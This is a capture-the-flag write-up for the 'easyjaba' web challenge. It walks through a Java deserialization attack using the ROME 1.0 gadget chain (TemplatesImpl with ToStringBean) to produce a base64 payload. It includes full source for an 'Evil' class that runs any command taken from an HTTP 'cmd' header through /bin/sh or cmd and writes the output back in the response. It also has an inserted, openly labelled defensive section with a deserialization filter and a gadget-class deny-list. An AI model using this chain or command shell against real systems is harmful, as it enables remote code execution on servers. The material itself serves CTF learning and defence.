Longyuan war "epidemic" 2021 network security competition web easyjaba
2022-07-05 04:02:00 【Sk1y】
Looking at the source code, a number of classes are disabled (blacklisted).
(A word on the decompiler: I had always used jd-gui, but with this challenge's attachment jd-gui does not show the disabled-class information, as shown below; the screenshot above was made with jadx 1.4.)
The attachment also ships rome 1.0, so the rome 1.0 chain is used.
In that chain the HashMap class is used to trigger hashCode(), and the BadAttributeValueExpException class is used to trigger toString(). Looking at the source of this challenge, it calls object.toString() directly, so no entry class is needed.
Rewrite the rome chain:
```java
package Rome;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;

public class Rome2 {
    public static void unserialize(byte[] bytes) throws Exception {
        ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
        ObjectInputStream oin = new ObjectInputStream(bain);
        oin.readObject();
    }

    public static byte[] serialize(Object o) throws Exception {
        try (ByteArrayOutputStream baout = new ByteArrayOutputStream();
             ObjectOutputStream oout = new ObjectOutputStream(baout)) {
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }

    // Reflectively set a private field (TemplatesImpl has no setters for these)
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // Malicious bytecode (the compiled Evil.class)
        byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\cc1\\src\\main\\java\\Rome\\Evil.class"));
        // byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\test\\target\\classes\\calc1.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "sk1y"); // Cannot be set to null, or it returns null
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{code});
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        // ToStringBean.toString() walks the getters of Templates, which loads the bytecode
        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
        // toStringBean.toString();
        byte[] aaa = serialize(toStringBean);
        System.out.println(Base64.getEncoder().encodeToString(aaa));
    }
}
```
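The chain above only works because ObjectInputStream will instantiate whatever class descriptor appears in the stream, so the standard defence on the receiving side is a deserialization filter (JEP 290, java.io.ObjectInputFilter, Java 9+) that is consulted before any class is resolved. The example below is added here and is not part of the writeup or the challenge: it pairs an allow-list with an explicit deny-list of the classes this chain passes through (ToStringBean/ObjectBean/EqualsBean, TemplatesImpl, BadAttributeValueExpException) and records which gadget was rejected so the attempt can be alerted on. Because it acts on class descriptors, it does not matter whether HashMap, Hashtable, BadAttributeValueExpException or a direct toString() call drives the chain. The class name FilteredDeserializer, its method names and the package com.example.app are my own assumptions, not something from the page.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import javax.management.BadAttributeValueExpException;

public class FilteredDeserializer {

    // Classes the rome chain walks through, matched by name prefix. They would already fall
    // under the allow-list's "!*", but naming them makes a rejection attributable to this chain.
    static final String[] KNOWN_GADGET_PREFIXES = {
        "com.sun.syndication.feed.impl.",                 // rome: ToStringBean, ObjectBean, EqualsBean
        "com.sun.org.apache.xalan.internal.xsltc.trax.",  // TemplatesImpl, TransformerFactoryImpl
        "javax.management.BadAttributeValueExpException", // the toString() entry class
    };

    // Allow-list for everything else. "com.example.app.**" stands for the application's own
    // serializable types (hypothetical package). java.util.Map$Entry must be listed because
    // HashMap.readObject() passes its Map.Entry[] table through the filter; "!*" rejects the rest.
    static final ObjectInputFilter ALLOW_LIST = ObjectInputFilter.Config.createFilter(
            "com.example.app.**;java.util.HashMap;java.util.Hashtable;java.util.Map$Entry;"
          + "java.lang.*;maxdepth=8;!*");

    // Names of rejected gadget classes, kept so the caller can raise an alert, not just fail.
    static final List<String> rejectedGadgets = new ArrayList<>();

    static final ObjectInputFilter FILTER = info -> {
        Class<?> cls = info.serialClass();
        if (cls == null) {
            // The filter is also called for depth/array-length checks, which carry no class.
            return ALLOW_LIST.checkInput(info);
        }
        while (cls.isArray()) {           // an array of a gadget type is still the gadget type
            cls = cls.getComponentType();
        }
        String name = cls.getName();
        for (String prefix : KNOWN_GADGET_PREFIXES) {
            if (name.startsWith(prefix)) {
                rejectedGadgets.add(name);
                return ObjectInputFilter.Status.REJECTED;
            }
        }
        return ALLOW_LIST.checkInput(info); // everything else must still pass the allow-list
    };

    // Counterpart of the challenge's unserialize(): the filter runs on every class descriptor
    // before ObjectInputStream instantiates anything.
    static Object readFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
            out.writeObject(o);
        }
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign input: an ordinary HashMap passes the allow-list.
        HashMap<String, String> benign = new HashMap<>();
        benign.put("key", "value");
        System.out.println("accepted: " + readFiltered(serialize(benign)));

        // Constructed sample: a plain instance of the chain's entry class carrying only a String,
        // with no rome objects behind it. The filter stops it at the class descriptor.
        byte[] entryOnly = serialize(new BadAttributeValueExpException("constructed sample"));
        try {
            readFiltered(entryOnly);
        } catch (InvalidClassException e) {
            System.out.println("rejected " + rejectedGadgets + ": " + e.getMessage());
        }
    }
}
```

Running it, the HashMap round-trips while the BadAttributeValueExpException sample fails with InvalidClassException ("filter status: REJECTED") before any of its fields are read. The same pattern string can be applied JVM-wide through the jdk.serialFilter system property; for a service like this challenge's, the better fix is still not to hand attacker-controlled bytes to ObjectInputStream at all.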
No outbound network
Because the target cannot reach the outside network, the Spring-based malicious class that circulates online for the no-outbound case is used:
```java
package Rome;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Method;
import java.util.Scanner;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    public Evil() throws Exception {
        // Fetch the current request/response from Spring's RequestContextHolder via reflection
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader", String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String) getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK" : "UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        // Write the command output into the HTTP response instead of calling out
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(), charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}
```
Compile it with javac to Evil.class and load this malicious class.
The final effect:
Looking at fmyyy's writeup: Hashtable can actually be used in place of HashMap; it also triggers hashCode(), so the original chain can be made to work (I did not manage it; not sure what the problem was). The specific links are given below.
Reference links